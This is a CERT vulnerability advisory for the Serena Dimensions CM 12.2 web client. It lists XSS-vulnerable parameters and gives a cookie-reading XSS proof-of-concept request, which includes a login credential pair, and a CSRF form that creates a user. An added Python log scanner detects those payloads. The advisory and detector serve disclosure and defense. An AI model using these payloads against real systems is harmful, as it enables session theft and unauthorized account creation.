Vulnerability Note VU#823452

Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities

Original Release date: 05 Mar 2014 | Last revised: 05 Mar 2014

Overview

Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contain multiple cross-site scripting vulnerabilities.

Description

Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contain multiple cross-site scripting (XSS) vulnerabilities and a cross-site request forgery (CSRF) vulnerability.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335

    #Unauthenticated vulnerable parameters
    /dimensions/ [DB_CONN parameter]
    /dimensions/ [DB_NAME parameter]
    /dimensions/ [DM_HOST parameter]
    /dimensions/ [MAN_DB_NAME parameter]


    #Authenticated vulnerable parameters
    /dimensions/ [framecmd parameter]
    /dimensions/ [identifier parameter]
    /dimensions/ [identifier parameter]
    /dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
    /dimensions/ [nav_frame parameter]
    /dimensions/ [nav_jsp parameter]
    /dimensions/ [target_frame parameter]
    /dimensions/ [id parameter]
    /dimensions/ [type parameter]


    Proof-of-Concept:
    GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1
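As an added detection example (not part of the CERT note and not Serena code), the following Python scans web-server access-log lines for requests to /dimensions/ whose listed parameters carry markup after URL decoding, including nested percent-encoding of the kind the proof-of-concept above uses. The parameter list is taken from the note; the log lines are constructed.

```python
"""Added example: scan web access-log lines for the VU#823452 XSS parameters.
Not Serena's or CERT's code; the log lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters the note lists as vulnerable on /dimensions/.
WATCHED_PARAMS = {
    "DB_CONN", "DB_NAME", "DM_HOST", "MAN_DB_NAME",             # unauthenticated
    "framecmd", "identifier", "merant.adm.adapters.AdmDialogPropertyMgr",
    "nav_frame", "nav_jsp", "target_frame", "id", "type",      # authenticated
}
# Markup a reflected value should never carry: tags, script URLs, event handlers.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon\w+\s*=", re.I)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def deep_unquote(value, rounds=3):
    """Undo nested percent-encoding (the PoC mixes %2f with %2525-style layers)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for watched params that carry markup."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/dimensions"):
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in WATCHED_PARAMS:
            for value in values:              # parse_qs has decoded one layer already
                decoded = deep_unquote(value)
                if MARKUP.search(decoded):
                    hits.append((name, decoded))
    return hits


# Constructed sample lines: a benign login, the note's MAN_DB_NAME payload as a
# proxy would log it (percent-encoded), and a double-encoded variant on DB_CONN.
LOG_LINES = [
    '10.0.0.5 - - [05/Mar/2014:10:00:00 +0000] "GET /dimensions/?jsp=login&DM_HOST=TEST1&DB_NAME=TEST2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Mar/2014:10:00:01 +0000] "GET /dimensions/?jsp=login&MAN_DB_NAME=2f%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E207 HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Mar/2014:10:00:02 +0000] "GET /dimensions/?DB_CONN=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 512',
]
```

Run `suspicious_params` over each line of an access log; a non-empty result for a watched parameter is the trigger to review the request.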


CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336
    Proof-of-Concept:
    <html>

    <!-- CSRF PoC -->

    <body>

    <form
    action="
    http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
    User&create=yes" method="POST">
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;dept" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;id" value="HACKTEST1" />
    <input type="hidden" name="USER&#95;CURWORKSET" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />

    <input type="hidden" name="isUserEdit" value="false" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;site" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;phone" value="" />
    <input type="hidden" name="AUTOMATIC&#95;LOGIN" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;group&#95;id" value="" />
    <input type="hidden" name="null" value="" />
    <input type="hidden" name="DIALOG&#95;MODE" value="MODE&#37;5fCREATE" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;full&#95;name" value="HACKTEST1" />

    <input type="hidden" name="projectPicker" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />
    <input type="hidden" name="wait&#95;until&#95;loaded" value="" />
    <input type="hidden" name="projectPickerUid" value="1" />
    <input type="hidden" name="GROUPS&#95;ASSIGNED" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;email"
    value="ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl" />

    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

Impact

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session.

Solution

We are currently unaware of a practical solution to this problem.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.

Vendor Information

Vendor               Status   Date Notified   Date Updated
SERENA Software Inc  Unknown  -               04 Mar 2014

If you are a vendor and your product is affected, let us know.

CVSS Metrics

Group          Score   Vector
Base           7.1     AV:N/AC:M/Au:N/C:C/I:N/A:N
Temporal       5.4     E:U/RL:U/RC:UC
Environmental  1.5     CDP:L/TD:L/CR:ND/IR:ND/AR:ND

Credit

Thanks to Ken Cijsouw for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

  • CVE IDs: CVE-2014-0335 CVE-2014-0336
  • Date Public: 07 Mar 2014
  • Date First Published: 05 Mar 2014
  • Date Last Updated: 05 Mar 2014
  • Document Revision: 7

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.